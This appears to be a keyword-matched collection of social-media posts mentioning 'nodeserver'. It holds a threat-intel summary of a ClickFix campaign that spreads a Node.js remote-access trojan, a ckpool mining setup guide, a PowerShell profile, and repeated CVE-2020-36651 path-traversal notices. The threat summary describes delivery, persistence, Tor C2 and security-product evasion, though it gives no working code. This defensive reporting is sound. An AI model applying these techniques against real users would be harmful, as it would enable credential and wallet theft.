#threatreport #MediumCompleteness From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel | 06-04-2026 Source: netskope.com/blog/from-click… Key details below ↓ 💀Threats: Clickfix_technique, Legionloader, Lumma_stealer, 🎯Victims: Windows users, Cryptocurrency wallets 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0 🤖LLM extracted TTPs:` T1005, T1027, T1027.010, T1041, T1057, T1059.001, T1059.003, T1059.007, T1071, T1082, ... 🧨IOCs: - Command: 1 - Domain: 2 - File: 26 - Registry: 1 - Path: 1 - Hash: 1 - Url: 3 💽Software: Node.js, Windows Registry, Windows Defender, Telegram 🔢Algorithms: xor, pbkdf2, ecdh, aes-256-cbc, base64, sha256 🔠Functions: setTimeout, reshuffleConfig 📜Programming Languages: javascript, powershell 💻Platforms: x64, x86 #threatreport: Netskope Threat Labs has identified a new cyber threat campaign utilizing ClickFix, predominantly targeting Windows users. This campaign, which began delivering custom malware in early 2025, employs a modular NodeJS-based remote access Trojan (RAT) that is designed to execute malicious activities seamlessly while minimizing its detection footprint. This malware is delivered through malicious MSI installers that, when activated, covertly download and execute the payload without user intervention, avoiding traditional security measures. The malware uses an innovative approach, ensuring all primary stealing modules and communication protocols operate entirely in memory, which prevents forensic analysis from easily revealing its functionalities. When the user interacts with a fake CAPTCHA, a base64-encoded PowerShell command operates in the background to download and install the RAT using the NodeServer-Setup-Full.msi package. The MSI installer is notably self-sufficient, carrying a full Node.js runtime and dependencies in its package, negating the need for prior installations on the victim’s machine. Permanent access is maintained as the malware edits the Windows Registry, ensuring it launches every time the system starts. It achieves command-and-control (C2) communication through gRPC over the Tor network, significantly obscuring its operational infrastructure. This sophisticated C2 architecture supports bidirectional communication which allows for real-time command execution and data retrieval. An operational security breach by the attackers disclosed an admin panel's protocol definitions, revealing their malware-as-a-service (MaaS) framework. This backend system is crafted to manage multiple operators and effectively track various cryptocurrency assets while allowing operators to execute commands, manage stored modules, and handle victim profiles. The framework's modularity not only facilitates versatility in data theft but also expands the malware’s capabilities beyond simple information gathering to arbitrary code execution. Moreover, the malware implements multi-layered encryption to safeguard its configuration data before establishing C2 connections, utilizing either AES-256-CBC or XOR encryption methods. It scans for over 30 security products to assess the system's defenses before executing payloads, allowing attackers to adjust tactics accordingly. The architecture of this malware represents a significant evolution in cyber threats, shifting toward modular, binary-less execution while targeting cryptocurrency wallets. By fully utilizing the Tor network for secure communications, the malware evades static defenses, marking a critical development in the landscape of cyber threats that analysts will need to closely monitor in the future.

【From ClickFix to MaaS: Exposing a Modular Windows RAT and Its Admin Panel】 Netskope Threat Labsによると、偽CAPTCHAを使うClickFix経由で、Node.jsベースのRAT/インフォスティーラーを配布する新キャンペーンが確認されました。 PowerShellで `NodeServer-Setup-Full.msi` を静かに導入し、C2接続後に追加モジュールをメモリ上へ動的ロード。Tor上のgRPC通信で双方向C2を張る点が特徴です。 さらに攻撃者のOPSECミスから、複数オペレーター対応のMaaS管理基盤や暗号資産ウォレット追跡、Telegram通知機能も露出。 偽CAPTCHA起点のPowerShell、Runキー永続化、Tor/gRPC通信を見たい事例です。 #CyberSecurity #ClickFix #Malware #RAT #Windows #ThreatIntel netskope.com/blog/from-click…

if i wanted to be fast i would find a rust develoepr and ask them to make wasm bindings which run inside of a node server that i call by python http requests to nodeserver to wasm to rust to 'ur super effing fast data encoding'.

Here, I wrote up some instructions on how I got ckpool working on my Ubuntu 22.04 VM (will probably work in 24.04 and debian, too) 1) Become root: sudo su - 2) Install required packages: apt install build-essential yasm autoconf automake libtool libzmq3-dev pkgconf wget nano unzip 3) Download source, compile, and install: wget bitbucket.org/ckolivas/ckpoo… unzip bb7b0aebe08e.zip cd ckolivas-ckpool-bb7b0aebe08e/ ./autogen.sh ./configure make make install 4) create a dedicated user for running ckpool: useradd -s /bin/bash -c "ckpool mining pool" -d /home/ckpool -m -g ckpool ckpool passwd ckpool 5) create configs and set permissions: mkdir /etc/ckpool /var/log/ckpool chown ckpool:ckpool /var/log/ckpool cp ckpool.conf /etc/ckpool/ 6) Edit bitcoin.conf and set set rpcuser, rpcpassword if not already set. and add blocknotify You can make up any username and password you want. nano /home/satoshi/.bitcoin/bitcoin.conf rpcuser=smugllama rpcpassword=30sMSjdw93wjew922 blocknotify=/usr/local/bin/notifier -n llamapool %s Restart bitcoin so it reads in the changes 7) Add the user that bitcoin runs as to the ckpool group so it has permissions to write to the notifier socket. usermod -a -G ckpool satoshi 8) Edit your ckpool.conf and configure it nano /etc/ckpool/ckpool.conf Set the "auth" to match the rpcuser from your bitcoin.conf Set the "pass" to match the rpcpassword from your bitcoin.conf Since I don't have a backup node, I deleted the whole section for the backup node Set the "btcaddress" to your bitcoin address Change your "btcsig" if you want to be famous. Change the "serverurl", "nodeserver", and "trusted" to only be your server's IP Change "logdir" to /var/log/ckpool 9) Test out ckpool and make sure it works. su - ckpool /usr/local/bin/ckpool --btcsolo --log-shares --name llamapool --group ckpool --config /etc/ckpool/ckpool.conf It should stay running. If not, fix any errors. If it works, press CTRL C to stop it and type exit to go back to root 10) Add a service for it. nano /etc/systemd/system/ckpool.service [Unit] Description=ckpool daemon After=multi-user.target [Service] Type=simple User=ckpool Group=ckpool WorkingDirectory=/home/ckpool ExecStart=/usr/local/bin/ckpool --btcsolo --log-shares --name llamapool --group ckpool --config /etc/ckpool/ckpool.conf [Install] WantedBy=multi-user.target Then run: systemctl daemon-reload systemctl start ckpool if it stays running and you don't see any errors, you can set it to run on OS boot-up systemctl enable ckpool 11) Watch the log files: tail -f /var/log/ckpool/llamapool.log /home/satoshi/.bitcoin/debug.log You should now be able to point your miners at your own pool on your server IP.

Damn, the @grok is really just impressively awesome. He made me this cool PowerShell Profile, in just 5 Minutes. This is an outstanding extraordinary. # Apply settings only in VS Code integrated terminal if ($env:TERM_PROGRAM -eq "vscode") { # Function to run Flutter app in Chrome function Invoke-FlutterChrome { <# .SYNOPSIS Runs a Flutter app in Chrome. .DESCRIPTION Executes 'flutter run -d chrome' to launch a Flutter application in the Chrome browser. Only available in VS Code terminal. .EXAMPLE rc #> try { Write-Host "Launching the Flutter app in Chrome" -ForegroundColor Green & flutter run -d chrome } catch { Write-Error "Error occurred while running Flutter: $_" } } # Function to start Node.js server for CORS proxy function Start-NodeServer { <# .SYNOPSIS Starts a Node.js server for CORS proxy. .DESCRIPTION Executes 'node server.js' in the directory 'C:\Users\Fakepath\Desktop\VScodeProjects\nodejsServer\cors-proxy' to start a Node.js server. Only available in VS Code terminal. .EXAMPLE nsv #> try { Set-Location -Path "C:\Users\Fakepath\Desktop\VScodeProjects\nodejsServer\cors-proxy" Write-Host "Starting the Node.js server:" -ForegroundColor Green & node server.js } catch { Write-Error "Error occurred while starting the server: $_" } } # Register aliases for the functions Set-Alias -Name rc -Value Invoke-FlutterChrome # Set-Alias -Name r -Value Invoke-FlutterChrome Set-Alias -Name nodeserver -Value Start-NodeServer Set-Alias -Name nodesvr -Value Start-NodeServer Set-Alias -Name nsv -Value Start-NodeServer }

The Server is built with 3 layers: a UDP Server, a Routing Server, and the NodeServer with its chunks. This ensures a smooth and scalable network structure for our MMORPG Teredor!

13/ 🌐 Web servers and fs module – a match made in heaven! Serve static files with ease! 🌍 #NodeServer #WebDev

✅ New Episode on RackNerdTV! 💻 How to Know What Node Your RackNerd VPS is Hosted On | 📺▶ WATCH HERE: youtu.be/YXZhXkjSSdg 🛒 ORDER VPS HOSTING at racknerd.com/kvm-vps #Node #kvm #kvmvps #vpshosting #webhosting #dedicatedserver #dedicatedhost #nodeserver

How to Create a WebSocket Connection with Node.js and a Raspberry Pi Pico W via @BttrProgramming #javascript #raspberrypi #nodeserver #raspberrypipicow #websocket #nodejs #100daysofcode #webdev #webdevelopment betterprogramming.pub/how-to…

New post from sesin.at (CVE-2020-36651 (nodeserver)) has been published on sesin.at/2023/01/25/cve-2020…

New post from sesin.at (CVE-2020-36651 (nodeserver)) has been published on sesin.at/2023/01/25/cve-2020…

🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) Severity: HIGH nvd.nist.gov/vuln/detail/CVE…

Node.js is an open-source server environment and library that uses Javascript on the server side. Get ready to know more about Node.js: blog.serverhub.com/all-about… #nodeserver #nodejs #programmingcode #programminglanguage #serverside #javascript

🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) nvd.nist.gov/vuln/detail/CVE…

CVE-2020-36651 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. Th... cve.mitre.org/cgi-bin/cvenam…

🚨 NEW: CVE-2020-36651 🚨 A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation l... (click for more) nvd.nist.gov/vuln/detail/CVE…

CVE-2020-36651 : A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The na... cve.report/CVE-2020-36651

New post from sesin.at (CVE-2020-36651 | youngerheart nodeserver nodeserver.js path traversal) has been published on sesin.at/2023/01/17/cve-2020…

New post from sesin.at (CVE-2020-36651 | youngerheart nodeserver nodeserver.js path traversal) has been published on sesin.at/2023/01/17/cve-2020…

CVE-2020-36651 | youngerheart nodeserver nodeserver.js path traversal dlvr.it/SgzTS6